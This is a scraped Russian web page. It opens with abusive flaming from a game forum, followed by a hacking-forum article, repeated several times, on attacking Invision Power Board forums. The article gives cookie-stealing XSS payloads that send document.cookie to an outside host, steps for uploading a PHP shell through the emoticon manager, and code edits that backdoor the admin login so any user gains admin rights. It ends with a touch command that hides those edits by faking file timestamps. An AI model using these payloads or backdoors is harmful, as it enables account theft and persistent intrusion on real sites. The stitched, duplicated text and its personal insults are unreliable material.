Я ДОЛБОЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕБ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Официальный форум проекта GTA Stanton |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » Официальный форум проекта GTA Stanton » Проект Grand Theft Auto: Stanton » Я УЗНАЛ НЕВЪЕБЕННУЮ ИСТИНУ!!!!
Я ДОЛБОЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕБ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
мы знаем!
ИМЕННАХ!
точнапох!
ГЫЫЫЫЫЫЫЫЫЫ
ГЫЫЫЫЫЫЫЫЫЫ
ГЕЙМАН НЕ ТОЛЬКО ДОЛБОЁБ ОН ЕЩЁ И ПИЗДОПИДОР СУКА ЗАЛУПОГЛАЗЫЙ
Кейман сцуко почему ты узнаеш всё самым последним?Да патамушо ты даун епт!!!!!!!!!!!!!!!!!!
ДО НЕГО КАК ДО ЖИРАФА ДОХОДИТ, ТОРМОЗ ОН БЛЯТЬ ЕБУЧИЙ
нет, не как до жырафа, у жырафа на шее бошка, донево доходит как до гусеницы!!
ГЫ-ГЫ ГЕЙМАН СОРОКОНОЖКА ЕБАНАЯ
- ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
